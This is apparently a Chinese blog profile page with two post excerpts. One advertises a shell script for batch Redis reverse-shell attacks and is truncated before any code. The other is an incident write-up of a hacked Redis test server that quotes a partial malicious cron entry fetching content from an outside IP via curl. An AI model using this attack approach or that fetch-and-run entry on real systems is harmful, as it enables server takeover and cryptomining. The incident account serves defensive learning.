- 博客(2)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 shell脚本实现批量自动redis反弹shell攻击
一、shell实现redis反弹shell [root@xingcheng attack]# cat shell_rebound.sh #!/bin/bash ##create by xingcheng ##20180403 ##function 批量redis反弹shell获取系统权限,主要针对没有安全策略的reids服务器和弱口令redis服务器,他们往往使用root账户运行 #ip_...
2018-04-03 17:09:56
1526
原创 服务器攻击之reids篇(2018.4.2)
一、事故原因 开发使用测试机redis 1.开放0.0.0.0 2.密码使用弱口令 3.使用root用户运行redis 梳理一下被黑过程 扫描服务器端口 –> 弱口令拿到reids权限 –> 反弹shell写入秘钥 –> 肉鸡(修改计划任务,挖矿) 贴一下被修改的计划任务, */5 * * * * curl -fsSL http://165.225.157...
2018-04-02 20:14:58
536
Elasticsearch5.2可视化插件 elasticsearch-head-master
Elasticsearch5.2可视化插件 elasticsearch-head-master
2017-11-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人